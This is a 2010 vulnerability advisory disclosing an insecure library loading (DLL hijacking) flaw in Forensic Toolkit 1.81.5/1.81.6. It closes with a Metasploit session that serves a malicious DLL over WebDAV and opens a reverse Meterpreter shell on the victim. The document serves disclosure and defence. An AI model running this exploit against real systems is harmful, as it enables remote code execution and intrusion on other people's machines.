Advisory: Forensic Toolkit - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking) [Update: 02.09.2010]
- in a nutshell:
---------------------------------------------
Forensic Toolkit - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking)
Date: 29.08.2010
---------------------------------------------
- Forensic Toolkit Description
Forensic Toolkit (FTK) is recognized around the world as the standard in computer forensics software. This court-validated digital investigations platform delivers cutting-edge computer forensic analysis, decryption and password cracking all within an intuitive and customizable interface.
- Insecure Library Loading Allows Remote Code Execution
This vulnerability was discovered using the Metasploit Framework with the following option: "set EXTENSIONS ftk"
For more vulnerability details please check the links in the reference section.
- Affected Versions
1.81.5/1.81.6 - other releases may also be affected.
- Solution
It is not known if there are fixed releases available.
- Credits
The vulnerability was discovered by m1k3 - m1k3#at#m1k3#dot#at
- Timeline
29.08.2010 - vulnerability discovered
29.08.2010 - public disclosure
- Reference
http://www.accessdata.com/forensictoolkit.html
http://www.microsoft.com/technet/security/advisory/2269637.mspx
http://www.exploit-db.com/dll-hijacking-vulnerable-applications/
http://blog.metasploit.com/2010/08/better-faster-stronger.html
http://www.metasploit.com/modules/exploit/windows/browser/webdav_dll_hij...
http://www.s3cur1ty.de/advisories
- Exploiting example:
msf exploit(webdav_dll_hijacker) > set EXTENSIONS ftk
EXTENSIONS => ftk
msf exploit(webdav_dll_hijacker) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
BASENAME policy yes The base name for the listed files.
EXTENSIONS ftk yes The list of extensions to generate
SHARENAME documents yes The name of the top-level share.
SRVHOST 10.8.28.9 yes The local host to listen on.
SRVPORT 80 yes The daemon port to listen on (do not change)
URIPATH / yes The URI to use (do not change).
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST 10.8.28.9 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
<snip>
[*] 10.8.28.55:49275 PROPFIND /documents
[*] 10.8.28.55:49275 PROPFIND => 301 (/documents)
[*] 10.8.28.55:49275 PROPFIND /documents/
[*] 10.8.28.55:49275 PROPFIND => 207 Directory (/documents/)
[*] 10.8.28.55:49275 PROPFIND /documents/MFC90DEU.DLL
[*] 10.8.28.55:49275 PROPFIND => 207 File (/documents/MFC90DEU.DLL)
[*] 10.8.28.55:49275 GET => DLL Payload
[*] 10.8.28.55:49275 PROPFIND /documents/rundll32.exe
[*] 10.8.28.55:49275 PROPFIND => 404 (/documents/rundll32.exe)
[*] Sending stage (748544 bytes) to 10.8.28.55
[*] Meterpreter session 9 opened (10.8.28.9:4444 -> 10.8.28.55:49276) at Sun Aug 29 23:09:54 +0200 2010
[*] 10.8.28.55:49275 PROPFIND /documents/CodeMeter.exe
[*] 10.8.28.55:49275 PROPFIND => 404 (/documents/CodeMeter.exe)
msf exploit(webdav_dll_hijacker) > sessions -i 9
[*] Starting interaction with 9...
meterpreter > getuid
Server username: m1k3-Vista\m1k3
Recent comments
3 weeks 3 days ago
3 weeks 5 days ago
4 weeks 3 days ago
4 weeks 3 days ago
9 weeks 6 days ago
10 weeks 2 days ago
10 weeks 3 days ago
11 weeks 2 days ago
11 weeks 2 days ago
11 weeks 3 days ago